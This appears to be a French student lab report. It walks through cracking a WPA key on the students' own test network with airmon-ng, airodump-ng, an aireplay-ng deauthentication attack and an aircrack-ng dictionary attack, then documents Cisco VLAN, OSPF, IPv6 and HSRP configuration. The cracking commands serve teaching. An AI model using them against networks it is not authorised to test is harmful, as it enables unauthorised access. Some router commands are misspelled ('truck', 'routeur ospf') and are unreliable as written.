TP sysres IMA5sc 2019/2020 G1

De Wiki d'activités IMA


Cassage de clé WPA

Phase de reniflement
Phase d'attaque par dictionnaire

N'ayant pas fait cet exercice en TP, nous avons réalisé les tests suivant chez nous avec deux téléphones (un pour le point d'accès et un autre pour le client) et un ordinateur avec une carte wifi capable du mode "monitor".

Pour aider à la lecture des commandes, voici les données de l'expérience :

  • essid du point d'accès : HackMe
  • mot de passe du point d'accès : Robotech
  • bssid du point d'accès : F0:D7:AA:29:1C:52
  • bssid de la station : 34:31:11:B8:87:97

La mise en mode "monitor" de l'interface se fait par la commande suivante :

airmon-ng start wlan0

Après ça, il faut repérer le réseau à attaquer grâce à airodump-ng :

airodump-ng wlan0mon

Avoir trouvé un point d'accès avec une station connectée, on note son bssid (ou essid) et son canal pour lancer la phase de reniflement :

airodump-ng wlan0mon --channel 6 --bssid F0:D7:AA:29:1C:52 -w dump

Dans quelques cas, il est possible de forcer la déconnexion de la station en envoyant des packets de déconnexion pirate au point d'accès en utilisant l’adresse physique de la station :

aireplay-ng -0 0 -a F0:D7:AA:29:1C:52 -h 34:31:11:B8:87:97 wlan0mon

Malheureusement, notre point d'accès est protéger contre ce genre d'attaque. Il faut donc être patient et attendre une reconnexion de la part de la station... Une fois les packets de l'établissement de liaison capturé par airodump-ng, on lance une attaque par force brute ou, dans notre cas, une attaque par dictionnaire avec aircrack-ng :

aircrack-ng -w ../dics/rockyou.txt dump-01.cap

Après quelques minutes, le mot de passe est trouvé.

Architecture réseau

Illustration de la redondance réseau. Image réalisée par AIT MOUHEB Arezki et MEJBAR Lina

Présentation

Pour assurer une connectivité constante entre le réseau de l'école (et internet) et notre parc informatique de machine virtuelle, une redondance de la partie réseau est nécessaire. Deux commutateurs et deux routeurs sont connectés entre-eux et assure la liaison entre le serveur Xen, hébergeant nos machines virtuelles et le réseau de l'école (voir schéma ci-contre).

Le cahier des charges est le suivant :

  • Un routage IPv4
  • Interconnexion avec Internet (IPv4)
  • Un routage IPv6
  • Interconnexion avec Internet (IPv6)
  • Sécurisation du réseau en implantant le protocole HSRP sur les routeurs.
  • Configuration des bornes wifi

Réalisation

La table d'adressage choisie est disponible ici : Table d’adressage.

Note : les configurations explicitées dans ce rapport ne concerne que le commutateur et le routeur en E306 (nommés commutateur 2 et routeur 2).

Liaisons trunk

Parce que certaines connexions doivent faire transiter les packets des différentes VLANs, elles doivent être en mode trunk. C'est le cas pour ces connexions :

  • Routeur 2 (via GigabitEthernet0/1) <-> Commutateur 2 (via GigabitEthernet4/1)
  • Routeur 2 (via GigabitEthernet0/50) <-> Commutateur 1
  • Commutateur 1 (via GigabitEthernet4/2) <-> Serveur Xen

Pour configurer une interface en mode truck, le configuration est la suivante :

configure terminal
 interface <INTERFACE>
  switchport
  switchport truck encapsulation dot1q
  switchport mode trunk
  exit
 exit
write

Routage IPv4

Chaque groupe (machine virtuelle) à le droit à un réseau local (10.60.10X.0/24, avec X le numéro du groupe). Il faut donc créer des VLANs pour chaque groupe sur chaque routeur et commutateur, de la la manière suivante :

configure terminal
 vlan 10X
  name <NOM_DU_GROUPE>
  exit
 exit
write

Ensuite, il faut allouer une adresse IPv4 au routeur :

configure terminal
 interface vlan 10X
  ip address 10.60.10X.2 255.255.255.0
  exit
 exit
write

Interconnexion avec Internet (IPv4)

Pour faire la connexion avec le réseau de l'école, il faut interconnecter notre routeur avec celui de l'école. Une VLAN existe déjà dans la configuration du routeur école avec les caractéristiques suivantes : VLAN 131, nommé TP-INTERCO1, réseau 192.168.222.0/29. Pour cela la configuration suivante a été enregistré sur notre routeur :

configure terminal
 vlan 131
  name interconnexion
  exit
 interface vlan 131
  ip address 192.168.222.9 255.255.255.248
  exit
 interface TenGigabitEthernet0/2
  switchport
  switchport mode access
  switchport access vlan 131
  exit
 exit
write

Il faut ensuite que notre routeur et le routeur de l'école s'échange leurs routes. Il est demander de réaliser cet échange avec le protocole de routage OSPF. La configuration sur notre routeur est la suivante :

configure terminal
 routeur ospf 1
  routeur-id 10.60.100.2
  log-adjacency-changes
  summary-address 193.48.57.176 255.255.255.240
  summary-address 10.0.0.0 255.0.0.0 not-advertise
  redistribute connected subnets
  redistribute static subnets route-map ospf
  network 192.168.222.8 0.0.0.7 area 2
  exit
 exit
write

Routage IPv6

Avant de passer à la configuration du routeur pour l'IPv6, il faut d'abord activer le mode "dual-ipv4-and-ipv6" s'il n'est pas activé. Voici la configuration :

configure terminal
 sdm prefer dual-ipv4-and-ipv6 default
 exit
reload

Les commandes pour l'IPv6 sont maintenant activées, nous pouvons configurer les VLANs pour accepter l'IPv6 :

configure terminal
 interface vlan 10X
  ipv6 enable
  ipv6 address 2001:660:4401:60AX::/64 eui-64
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900
  ipv6 nd router-preference High
  exit
 exit
write

Interconnexion avec Internet (IPv6)

Même topo que pour l'interconnexion IPv4 mais avec le protocole RIPv6 cette fois-ci, dont la configuration est la suivante :

configure terminal
 interface vlan 131
  ipv6 enable
  ipv6 address FE80::10 link-local
  ipv6 rip tpima5sc enable
  exit
 exit
write

Sécurisation du réseau

Pour rendre le réseau plus robuste, il est demander d'utiliser le protocole HSRP sur nos routeur, dont la configuration est la suivante sur chaque vlan de groupe :

configure terminal
 interface vlan 10X
  standby version 2
  standby 105 ip 10.60.105.3
  standby 105 preempt
  exit
 exit
write